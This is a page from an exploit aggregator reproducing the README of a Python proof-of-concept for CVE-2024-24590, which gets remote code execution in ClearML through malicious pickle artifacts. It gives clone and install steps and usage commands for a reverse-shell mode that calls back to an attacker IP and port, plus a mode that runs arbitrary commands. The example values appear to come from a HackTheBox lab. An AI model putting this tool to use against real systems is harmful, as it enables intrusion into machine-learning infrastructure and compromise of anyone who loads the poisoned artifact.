Exploit for Deserialization of Untrusted Data in Clear Clearml exploit

Share

## https://sploitus.com/exploit?id=8B30E3BF-DB39-5D11-8B2F-4D62226FB960 # ClearML Exploit Script This repository contains a Python exploit script for CVE-2024-24590 The script is designed to upload a malicious pickle file to ClearML, which executes a reverse shell or a custom command. ## Features - Uploads a malicious pickle artifact to ClearML. - Executes a reverse shell or a custom command on the target machine. - Supports custom project and task names. - Allows setting a tag on the task. ## Usage ### Prerequisites - Python 3.x - ClearML SDK - argparse (usually included with Python) ### Installation 1. Clone the repository: ```bash git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git cd CVE-2024-24590-ClearML-RCE-CMD-POC ``` 2. Install the ClearML SDK: ```bash pip install clearml clearml-init ``` ### Running the Script The script supports two modes of operation: `default` and `cmd`. #### Default Mode In this mode, you must provide the attacker's IP and port to establish a reverse shell. ```bash python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port> ``` #### CMD Mode In this mode, you can provide a custom command to be executed. ```bash python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>" ``` #### Examples ```bash python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234" ``` ```bash python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh" ``` #### whoami - HackTheBox: sl4sh1t0 - Telegram: sl4sh1t0 - X (Twitter): @diegogarciayala #### Credits https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/